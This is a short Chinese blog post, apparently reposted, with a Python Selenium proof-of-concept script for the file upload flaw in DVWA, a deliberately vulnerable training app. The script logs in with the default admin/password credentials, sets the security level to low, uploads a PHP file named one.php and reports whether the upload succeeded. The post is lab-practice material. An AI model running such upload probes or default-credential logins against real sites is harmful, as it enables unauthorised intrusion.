POC——DVWA's File Upload
作者:互联网
Level——low
最近了解了一下python的selenium,干脆用它写一个POC吧~
1 from selenium.webdriver import Chrome 2 from selenium.webdriver.support.ui import WebDriverWait 3 from selenium.webdriver.common.by import By 4 from selenium.webdriver.support.select import Select 5 import time 6 7 driver = Chrome() 8 driver.get("http://192.168.117.130/DVWA-1.9/login.php") 9 WebDriverWait(driver,10).until(lambda d:"Login" in d.title) 10 driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/input[1]').send_keys("admin") 11 driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/input[2]').send_keys("password") 12 driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/p/input').click() 13 14 driver.find_element(By.XPATH,'//*[@id="main_menu_padded"]/ul[3]/li[1]').click() 15 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/form/select').click() 16 loc = (By.XPATH,'//*[@id="main_body"]/div/form/select') 17 ele = driver.find_element(*loc) 18 s = Select(ele) 19 s.select_by_value("low") 20 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/form/input[1]').click() 21 22 driver.find_element(By.XPATH,'//*[@id="main_menu_padded"]/ul[2]/li[5]').click() 23 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/form/input[2]').send_keys('F:\Python\Project\POC\POC(Proof Of Concept)\one.php') 24 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/form/input[3]').click() 25 response = driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/pre') 26 27 re = 'one.php' 28 flag=re in str(response.text) 29 30 if flag: 31 print("It looks likely vulnerable") 32 else: 33 print("It is strong") 34 35 driver.close()
标签:XPATH,driver,DVWA,POC,find,File,div,element,id 来源: https://www.cnblogs.com/wavesky/p/16371619.html